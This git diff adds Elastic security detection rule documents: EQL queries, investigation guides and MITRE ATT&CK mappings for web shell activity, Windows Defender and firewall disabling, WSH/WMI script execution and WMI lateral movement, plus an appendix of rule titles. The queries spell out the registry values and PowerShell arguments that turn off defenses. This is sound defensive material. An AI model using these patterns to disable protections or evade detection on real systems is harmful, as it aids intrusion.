monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("w3wp.exe", "httpd.exe", "nginx.exe", "php.exe", "php-cgi.exe", "tomcat.exe") and + process.name : ("cmd.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "wmic.exe", "wscript.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: Web Shell +** ID: T1505.003 +** Reference URL: https://attack.mitre.org/techniques/T1505/003/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification.asciidoc new file mode 100644 index 0000000000..9311eecc55 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification.asciidoc @@ -0,0 +1,142 @@ +[[prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification]] +=== Windows Defender Disabled via Registry Modification + +Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://thedfirreport.com/2020/12/13/defender-control/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Windows Defender Disabled via Registry Modification + +Microsoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks. + +This rule monitors the registry for configurations that disable Windows Defender or the start of its service. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check if this operation was approved and performed according to the organization's change management policy. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed. + +### Related rules + +- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87 +- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Re-enable Windows Defender and restore the service configurations to automatic start. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and + ( + ( + registry.path: ( + "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware" + ) and + registry.data.strings: ("1", "0x00000001") + ) or + ( + registry.path: ( + "HKLM\\System\\*ControlSet*\\Services\\WinDefend\\Start", + "\\REGISTRY\\MACHINE\\System\\*ControlSet*\\Services\\WinDefend\\Start" + ) and + registry.data.strings in ("3", "4", "0x00000003", "0x00000004") + ) + ) and + + not process.executable : + ("?:\\WINDOWS\\system32\\services.exe", + "?:\\Windows\\System32\\svchost.exe", + "?:\\Program Files (x86)\\Trend Micro\\Security Agent\\NTRmv.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Indicator Blocking +** ID: T1562.006 +** Reference URL: https://attack.mitre.org/techniques/T1562/006/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell.asciidoc new file mode 100644 index 0000000000..1f42708196 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell.asciidoc @@ -0,0 +1,129 @@ +[[prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell]] +=== Windows Firewall Disabled via PowerShell + +Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps +* https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell +* http://powershellhelp.space/commands/set-netfirewallrule-psv5.php +* http://woshub.com/manage-windows-firewall-powershell/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Windows Firewall Disabled via PowerShell + +Windows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a device and blocks unauthorized network traffic flowing into or out of the local device. + +Attackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity. + +This rule identifies patterns related to disabling the Windows firewall or its rules using the `Set-NetFirewallProfile` PowerShell cmdlet. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. + +### False positive analysis + +- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing troubleshooting. +- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Re-enable the firewall with its desired configurations. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.action == "start" and + (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name == "PowerShell.EXE") and + process.args : "*Set-NetFirewallProfile*" and + (process.args : "*-Enabled*" and process.args : "*False*") and + (process.args : "*-All*" or process.args : ("*Public*", "*Domain*", "*Private*")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify System Firewall +** ID: T1562.004 +** Reference URL: https://attack.mitre.org/techniques/T1562/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-executing-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-executing-powershell.asciidoc new file mode 100644 index 0000000000..d11bc6a3e4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-executing-powershell.asciidoc @@ -0,0 +1,142 @@ +[[prebuilt-rule-8-10-5-windows-script-executing-powershell]] +=== Windows Script Executing PowerShell + +Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Windows Script Executing PowerShell + +The Windows Script Host (WSH) is an Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation. + +Attackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals. + +This rule looks for the spawn of the `powershell.exe` process with `cscript.exe` or `wscript.exe` as its parent process. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate commands executed by the spawned PowerShell process. +- If unsigned files are found on the process tree, retrieve them and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Determine how the script file was delivered (email attachment, dropped by other processes, etc.). +- Investigate other alerts associated with the user/host during the past 48 hours. + +### False positive analysis + +- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Reimage the host operating system and restore compromised files to clean versions. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("cscript.exe", "wscript.exe") and process.name : "powershell.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi.asciidoc new file mode 100644 index 0000000000..1f4a383cf3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi.asciidoc @@ -0,0 +1,112 @@ +[[prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi]] +=== Windows Script Interpreter Executing Process via WMI + +Identifies use of the built-in Windows script interpreters (cscript.exe or wscript.exe) being used to execute a process via Windows Management Instrumentation (WMI). This may be indicative of malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan = 5s + [any where host.os.type == "windows" and + (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : "wmiutils.dll" or file.name : "wmiutils.dll") and process.name : ("wscript.exe", "cscript.exe")] + [process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "wmiprvse.exe" and + user.domain != "NT AUTHORITY" and + (process.pe.original_file_name : + ( + "cscript.exe", + "wscript.exe", + "PowerShell.EXE", + "Cmd.Exe", + "MSHTA.EXE", + "RUNDLL32.EXE", + "REGSVR32.EXE", + "MSBuild.exe", + "InstallUtil.exe", + "RegAsm.exe", + "RegSvcs.exe", + "msxsl.exe", + "CONTROL.EXE", + "EXPLORER.EXE", + "Microsoft.Workflow.Compiler.exe", + "msiexec.exe" + ) or + process.executable : ("C:\\Users\\*.exe", "C:\\ProgramData\\*.exe") + ) + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-wmi-incoming-lateral-movement.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-wmi-incoming-lateral-movement.asciidoc new file mode 100644 index 0000000000..97582c6b5c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-wmi-incoming-lateral-movement.asciidoc @@ -0,0 +1,89 @@ +[[prebuilt-rule-8-10-5-wmi-incoming-lateral-movement]] +=== WMI Incoming Lateral Movement + +Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan = 2s + + /* Accepted Incoming RPC connection by Winmgmt service */ + + [network where host.os.type == "windows" and process.name : "svchost.exe" and network.direction : ("incoming", "ingress") and + source.ip != "127.0.0.1" and source.ip != "::1" and source.port >= 49152 and destination.port >= 49152 + ] + + /* Excluding Common FPs Nessus and SCCM */ + + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "WmiPrvSE.exe" and + not process.Ext.token.integrity_level_name : "system" and not user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20") and + not process.executable : + ("?:\\Program Files\\HPWBEM\\Tools\\hpsum_swdiscovery.exe", + "?:\\Windows\\CCM\\Ccm32BitLauncher.exe", + "?:\\Windows\\System32\\wbem\\mofcomp.exe", + "?:\\Windows\\Microsoft.NET\\Framework*\\csc.exe", + "?:\\Windows\\System32\\powercfg.exe") and + not (process.executable : "?:\\Windows\\System32\\msiexec.exe" and process.args : "REBOOT=ReallySuppress") and + not (process.executable : "?:\\Windows\\System32\\inetsrv\\appcmd.exe" and process.args : "uninstall") + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-appendix.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-appendix.asciidoc new file mode 100644 index 0000000000..07a0d14082 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-appendix.asciidoc @@ -0,0 +1,313 @@ +["appendix",role="exclude",id="prebuilt-rule-8-10-5-prebuilt-rules-8-10-5-appendix"] += Downloadable rule update v8.10.5 + +This section lists all updates associated with version 8.10.5 of the Fleet integration *Prebuilt Security Detection Rules*. + + +include::prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc[] +include::prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc[] +include::prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc[] +include::prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region.asciidoc[] +include::prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device.asciidoc[] +include::prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device.asciidoc[] +include::prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc[] +include::prebuilt-rule-8-10-5-potential-dga-activity.asciidoc[] +include::prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc[] +include::prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user.asciidoc[] +include::prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc[] +include::prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user.asciidoc[] +include::prebuilt-rule-8-10-5-potential-network-scan-executed-from-host.asciidoc[] +include::prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell.asciidoc[] +include::prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-hack-tool-launched.asciidoc[] +include::prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded.asciidoc[] +include::prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid.asciidoc[] +include::prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps.asciidoc[] +include::prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc[] +include::prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection.asciidoc[] +include::prebuilt-rule-8-10-5-security-software-discovery-via-grep.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-java-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-hosts-file-modified.asciidoc[] +include::prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration.asciidoc[] +include::prebuilt-rule-8-10-5-bash-shell-profile-modification.asciidoc[] +include::prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification.asciidoc[] +include::prebuilt-rule-8-10-5-sudoers-file-modification.asciidoc[] +include::prebuilt-rule-8-10-5-network-activity-detected-via-cat.asciidoc[] +include::prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client.asciidoc[] +include::prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc[] +include::prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm.asciidoc[] +include::prebuilt-rule-8-10-5-sensitive-files-compression.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow.asciidoc[] +include::prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem.asciidoc[] +include::prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity.asciidoc[] +include::prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall.asciidoc[] +include::prebuilt-rule-8-10-5-attempt-to-disable-syslog-service.asciidoc[] +include::prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity.asciidoc[] +include::prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc[] +include::prebuilt-rule-8-10-5-file-made-immutable-by-chattr.asciidoc[] +include::prebuilt-rule-8-10-5-potential-disabling-of-apparmor.asciidoc[] +include::prebuilt-rule-8-10-5-potential-disabling-of-selinux.asciidoc[] +include::prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command.asciidoc[] +include::prebuilt-rule-8-10-5-file-deletion-via-shred.asciidoc[] +include::prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory.asciidoc[] +include::prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline.asciidoc[] +include::prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file.asciidoc[] +include::prebuilt-rule-8-10-5-kernel-module-removal.asciidoc[] +include::prebuilt-rule-8-10-5-system-log-file-deletion.asciidoc[] +include::prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid.asciidoc[] +include::prebuilt-rule-8-10-5-potential-defense-evasion-via-proot.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file.asciidoc[] +include::prebuilt-rule-8-10-5-esxi-discovery-via-find.asciidoc[] +include::prebuilt-rule-8-10-5-esxi-discovery-via-grep.asciidoc[] +include::prebuilt-rule-8-10-5-enumeration-of-kernel-modules.asciidoc[] +include::prebuilt-rule-8-10-5-hping-process-activity.asciidoc[] +include::prebuilt-rule-8-10-5-nping-process-activity.asciidoc[] 